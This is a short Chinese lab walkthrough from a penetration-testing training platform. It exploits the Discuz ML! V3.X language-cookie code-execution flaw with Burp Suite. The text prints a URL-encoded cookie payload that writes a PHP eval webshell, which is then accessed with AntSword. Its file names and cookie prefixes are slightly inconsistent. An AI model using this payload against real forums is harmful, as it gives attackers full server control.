Discuz ML! V3.X存在代码执行漏洞

Discuz ML! V3.X存在代码执行漏洞，攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码，进一步可获取整个网站的服务器权限

【安鸾渗透实战平台】

靶场：http://whalwl.site:8042/forum.php

首先先用burp抓包，将抓到的数据包发送到Repeater，构造请求参数

在cookies里我们可以看到“CKxv_2132_language=sc”这个参数，即为漏洞点。我们将数据包发送到repeater，进行修改拼接利用burp抓包，

将tSWa_2132_language=sc 后面填上Phpinfo就会显示所有phpinfo输出的响应

因为cookie字段中language没有对参数进行过滤直接拼接从而写入缓存文件之中，儿缓存文件随后被加载，从而造成代码执行

我们可以使用file_put_contents() 函数写入一句话木马’.file_put_contents(‘shell1.php’,urldecode(’<?php eval($_POST["moo"]);?>’)).'经过编码后为%27.file_put_contents%28%27shell1.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522moo%2522%255d%29%253b%253f%253e%27%29%29.%27

然后用浏览器访问http://whalwl.site:8042/shell.php

最后使用蚁剑连接

连接成功